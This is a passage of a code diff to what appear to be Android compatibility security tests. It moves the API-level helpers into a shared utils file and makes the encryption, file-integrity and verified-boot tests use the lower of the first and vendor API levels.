import androidx.test.runner.AndroidJUnit4;
@@ -47,8 +48,7 @@
@Before
public void setUp() throws Exception {
- final int firstApiLevel =
- SystemProperties.getInt("ro.product.first_api_level", VERSION.SDK_INT);
+ final int firstApiLevel = Math.min(getFirstApiLevel(), getVendorApiLevel());
assumeTrue("Skipping test: it only applies to devices that first shipped with S or later.",
firstApiLevel >= VERSION_CODES.S);
diff --git a/tests/tests/security/native/Android.bp b/tests/tests/security/native/Android.bp
index c0cb8c5..bf840b6 100644
--- a/tests/tests/security/native/Android.bp
+++ b/tests/tests/security/native/Android.bp
@@ -28,5 +28,8 @@
":__subpackages__",
],
srcs: ["utils.cpp"],
+ shared_libs: [
+ "libbase",
+ ],
export_include_dirs: ["."],
}
diff --git a/tests/tests/security/native/encryption/FileBasedEncryptionPolicyTest.cpp b/tests/tests/security/native/encryption/FileBasedEncryptionPolicyTest.cpp
index 2952105..e5d824c 100644
--- a/tests/tests/security/native/encryption/FileBasedEncryptionPolicyTest.cpp
+++ b/tests/tests/security/native/encryption/FileBasedEncryptionPolicyTest.cpp
@@ -37,17 +37,6 @@
#define R_API_LEVEL 30
#define S_API_LEVEL 31
-static int getFirstApiLevel(void) {
- int level = property_get_int32("ro.product.first_api_level", 0);
- if (level == 0) {
- level = property_get_int32("ro.build.version.sdk", 0);
- }
- if (level == 0) {
- ADD_FAILURE() << "Failed to determine first API level";
- }
- return level;
-}
-
#ifdef __arm__
// For ARM32, assemble the 'aese.8' instruction as an .inst, since otherwise
// clang does not accept it. It would be allowed in a separate file compiled
@@ -203,6 +192,7 @@
// https://source.android.com/security/encryption/file-based.html
TEST(FileBasedEncryptionPolicyTest, allowedPolicy) {
int first_api_level = getFirstApiLevel();
+ int vendor_api_level = getVendorApiLevel();
char crypto_type[PROPERTY_VALUE_MAX];
struct fscrypt_get_policy_ex_arg arg;
int res;
@@ -219,10 +209,13 @@
property_get("ro.crypto.type", crypto_type, "");
GTEST_LOG_(INFO) << "ro.crypto.type is '" << crypto_type << "'";
GTEST_LOG_(INFO) << "First API level is " << first_api_level;
+ GTEST_LOG_(INFO) << "Vendor API level is " << vendor_api_level;
// This feature name check only applies to devices that first shipped with
// SC or later.
- if(first_api_level >= S_API_LEVEL &&
+ int min_api_level = (first_api_level < vendor_api_level) ? first_api_level
+ : vendor_api_level;
+ if (min_api_level >= S_API_LEVEL &&
!deviceSupportsFeature("android.hardware.security.model.compatible")) {
GTEST_SKIP()
<< "Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.";
diff --git a/tests/tests/security/native/utils.cpp b/tests/tests/security/native/utils.cpp
index 373b00e..fb9b1ee 100644
--- a/tests/tests/security/native/utils.cpp
+++ b/tests/tests/security/native/utils.cpp
@@ -15,6 +15,10 @@
*/
#include <string>
+#include <vector>
+
+#include <android-base/properties.h>
+#include <gtest/gtest.h>
#include "utils.h"
@@ -34,4 +38,29 @@
pclose(p);
}
return device_supports_feature;
+}
+
+int getFirstApiLevel() {
+ int level = android::base::GetIntProperty("ro.product.first_api_level", 0);
+ if (level == 0) {
+ level = android::base::GetIntProperty("ro.build.version.sdk", 0);
+ }
+ if (level == 0) {
+ ADD_FAILURE() << "Failed to determine first API level";
+ }
+ return level;
+}
+
+int getVendorApiLevel() {
+ std::vector<std::string> BOARD_API_LEVEL_PROPS = {
+ "ro.board.api_level", "ro.board.first_api_level", "ro.vndk.version",
+ "ro.vendor.build.version.sdk"};
+ const int API_LEVEL_CURRENT = 10000;
+ for (const auto& api_level_prop : BOARD_API_LEVEL_PROPS) {
+ int api_level = android::base::GetIntProperty(api_level_prop, API_LEVEL_CURRENT);
+ if (api_level != API_LEVEL_CURRENT) {
+ return api_level;
+ }
+ }
+ return API_LEVEL_CURRENT;
}
\ No newline at end of file
diff --git a/tests/tests/security/native/utils.h b/tests/tests/security/native/utils.h
index d6c651c..3176dbb 100644
--- a/tests/tests/security/native/utils.h
+++ b/tests/tests/security/native/utils.h
@@ -18,5 +18,7 @@
#define CTS_TESTS_TESTS_SECURITY_NATIVE_UTILS_H
bool deviceSupportsFeature(const char *feature);
+int getFirstApiLevel();
+int getVendorApiLevel();
#endif // CTS_TESTS_TESTS_SECURITY_NATIVE_UTILS_H
diff --git a/tests/tests/security/native/verified_boot/VerifiedBootTest.cpp b/tests/tests/security/native/verified_boot/VerifiedBootTest.cpp
index 625ef66..bad6ef4 100644
--- a/tests/tests/security/native/verified_boot/VerifiedBootTest.cpp
+++ b/tests/tests/security/native/verified_boot/VerifiedBootTest.cpp
@@ -28,23 +28,14 @@
// The relevant Android API levels
constexpr auto S_API_LEVEL = 31;
-static int getFirstApiLevel() {
- int level = android::base::GetIntProperty("ro.product.first_api_level", 0);
- if (level == 0) {
- level = android::base::GetIntProperty("ro.build.version.sdk", 0);
- }
- if (level == 0) {
- ADD_FAILURE() << "Failed to determine first API level";
- }
- return level;
-}
-
// As required by CDD, verified boot MUST use verification algorithms as strong
// as current recommendations from NIST for hashing algorithms (SHA-256).
// https://source.android.com/compatibility/11/android-11-cdd#9_10_device_integrity
TEST(VerifiedBootTest, avbHashtreeNotUsingSha1) {
int first_api_level = getFirstApiLevel();
+ int vendor_api_level = getVendorApiLevel();
GTEST_LOG_(INFO) << "First API level is " << first_api_level;
+ GTEST_LOG_(INFO) << "Vendor API level is " << vendor_api_level;
if (first_api_level < S_API_LEVEL) {
GTEST_LOG_(INFO)
<< "Exempt from avb hash tree test due to old starting API level";
@@ -52,12 +43,16 @@
}
// This feature name check only applies to devices that first shipped with
- // SC or later. The check above already screens out pre-S devices.
- if(!deviceSupportsFeature("android.hardware.security.model.compatible")) {
+ // SC or later.
+ int min_api_level = (first_api_level < vendor_api_level) ? first_api_level
+ : vendor_api_level;
+ if (min_api_level >= S_API_LEVEL &&
+ !deviceSupportsFeature("android.hardware.security.model.compatible")) {
GTEST_SKIP()
<< "Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.";
- return;
+ return;
}
+
android::fs_mgr::Fstab fstab;
ASSERT_TRUE(ReadDefaultFstab(&fstab)) << "Failed to read default fstab";
diff --git a/tests/tests/security/src/android/security/cts/EncryptionTest.java b/tests/tests/security/src/android/security/cts/EncryptionTest.java
index fbef044..13bcdf2 100644
--- a/tests/tests/security/src/android/security/cts/EncryptionTest.java
+++ b/tests/tests/security/src/android/security/cts/EncryptionTest.java
@@ -51,7 +51,9 @@
Context context = InstrumentationRegistry.getInstrumentation().getContext();
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.S) {
+ final int firstApiLevel =
+ Math.min(PropertyUtil.getFirstApiLevel(), PropertyUtil.getVendorApiLevel());
+ if (firstApiLevel >= Build.VERSION_CODES.S) {
// Assumes every test in this file asserts a requirement of CDD section 9.
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
!context.getPackageManager()
diff --git a/tests/tests/security/src/android/security/cts/FileIntegrityManagerTest.java b/tests/tests/security/src/android/security/cts/FileIntegrityManagerTest.java
index 64b3c33..a0f2aea 100644
--- a/tests/tests/security/src/android/security/cts/FileIntegrityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/FileIntegrityManagerTest.java
@@ -62,7 +62,9 @@
mContext = InstrumentationRegistry.getInstrumentation().getContext();
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.S) {
+ final int firstApiLevel =
+ Math.min(PropertyUtil.getFirstApiLevel(), PropertyUtil.getVendorApiLevel());
+ if (firstApiLevel >= Build.VERSION_CODES.S) {
// Assumes every test in this file asserts a requirement of CDD section 9.
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
mContext.getPackageManager()
diff --git a/tests/tests/security/src/android/security/cts/VerifiedBootTest.java b/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
index 6342bf4..fb5d621 100644
--- a/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
+++ b/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
@@ -43,7 +43,9 @@
mContext = InstrumentationRegistry.getInstrumentation().getContext();
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.S) {
+ final int firstApiLevel =
+ Math.min(PropertyUtil.getFirstApiLevel(), PropertyUtil.getVendorApiLevel());
+ if (firstApiLevel >= Build.VERSION_CODES.S) {
// Assumes every test in this file asserts a requirement of CDD section 9.
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
mContext.getPackageManager()
